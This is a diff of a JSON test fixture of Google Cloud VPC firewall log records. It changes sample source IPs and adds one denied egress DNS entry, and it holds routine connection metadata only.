-{"insertId":"1f21ciqfpfssuo","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.0.2.126","src_port":64853},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"continent":"Asia","country":"omn"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-10-30T13:52:54.473174731Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-10-30T13:52:42.191988835Z"} -{"insertId":"8vcfeailjd","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.219","src_port":2897},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Krasnodar","continent":"Europe","country":"rus","region":"Krasnodar Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:31:22.738796433Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:31:19.421478847Z"} -{"insertId":"1bqgmw9feiabij","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:35.727004321Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:31.079508196Z"} -{"insertId":"1jrxaqbfe48bir","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:40.791816098Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:34.190831607Z"} -{"insertId":"1fw7drlfe2ty27","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.151","src_port":62551},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Berdychiv","continent":"Europe","country":"ukr","region":"Zhytomyr Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:48:47.038820509Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:48:41.449552758Z"} -{"insertId":"1yre751fekaxzs","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.241","src_port":44542},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Vicenza","continent":"Europe","country":"ita","region":"Veneto"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:10:30.804549999Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:10:24.214995318Z"} -{"insertId":"5kanfzfiqepkh","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.114","src_port":41293},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Tula","continent":"Europe","country":"rus","region":"Tula Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:35:28.934918322Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:35:23.504719962Z"} -{"insertId":"59z0t8fiow9vg","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.251","src_port":59106},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Stavropol","continent":"Europe","country":"rus","region":"Stavropol Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:36:54.238077643Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:36:52.135887769Z"} -{"insertId":"1y7e4yzff816cq","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:26.357446279Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:16.59353182Z"} -{"insertId":"lx5jlsfggpr0q","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:28.203068653Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:22.930570324Z"} -{"insertId":"18ynfbufer19m1","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.200","src_port":42716},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"İzmir","continent":"Asia","country":"tur","region":"İzmir"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:32:14.038485761Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:32:07.407039908Z"} -{"insertId":"tzddthfsr6fv5","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":80,"protocol":6,"src_ip":"10.28.0.16","src_port":46418},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:41:28.971534988Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:41:20.972747063Z"} -{"insertId":"1k2b7kefsnhzq7","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":80,"protocol":17,"src_ip":"10.28.0.16","src_port":58725},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:42:33.671883883Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:42:26.50532921Z"} -{"insertId":"1sdfuwxfk8hq1c","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":44666},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.531819246Z"} -{"insertId":"1sdfuwxfk8hq1b","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":44668},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.551617516Z"} -{"insertId":"yot1ojetjdiw","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.0.2.7","src_port":1683},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"city":"Almelo","continent":"Europe","country":"nld","region":"Overijssel"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:28.477733837Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:15.771161946Z"} -{"insertId":"5a27u1g22jks9e","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":45068},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.850729583Z"} -{"insertId":"5a27u1g22jks8t","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":45062},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.85023465Z"} +{"insertId":"4zuj4nfn4llkb","jsonPayload":{"connection":{"dest_ip":"67.43.156.13","dest_port":53,"protocol":17,"src_ip":"10.128.0.16","src_port":60094},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:35:24.466374097Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:35:17.214711274Z"} +{"insertId":"1f21ciqfpfssuo","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.168.2.126","src_port":64853},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"continent":"Asia","country":"omn"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-10-30T13:52:54.473174731Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-10-30T13:52:42.191988835Z"} +{"insertId":"8vcfeailjd","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.219","src_port":2897},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Krasnodar","continent":"Europe","country":"rus","region":"Krasnodar Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:31:22.738796433Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:31:19.421478847Z"} +{"insertId":"1bqgmw9feiabij","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:35.727004321Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:31.079508196Z"} +{"insertId":"1jrxaqbfe48bir","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:40.791816098Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:34.190831607Z"} +{"insertId":"1fw7drlfe2ty27","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.151","src_port":62551},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Berdychiv","continent":"Europe","country":"ukr","region":"Zhytomyr Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:48:47.038820509Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:48:41.449552758Z"} +{"insertId":"1yre751fekaxzs","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.241","src_port":44542},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Vicenza","continent":"Europe","country":"ita","region":"Veneto"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:10:30.804549999Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:10:24.214995318Z"} +{"insertId":"5kanfzfiqepkh","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.114","src_port":41293},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Tula","continent":"Europe","country":"rus","region":"Tula Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:35:28.934918322Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:35:23.504719962Z"} +{"insertId":"59z0t8fiow9vg","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.251","src_port":59106},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Stavropol","continent":"Europe","country":"rus","region":"Stavropol Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:36:54.238077643Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:36:52.135887769Z"} +{"insertId":"1y7e4yzff816cq","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:26.357446279Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:16.59353182Z"} +{"insertId":"lx5jlsfggpr0q","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:28.203068653Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:22.930570324Z"} 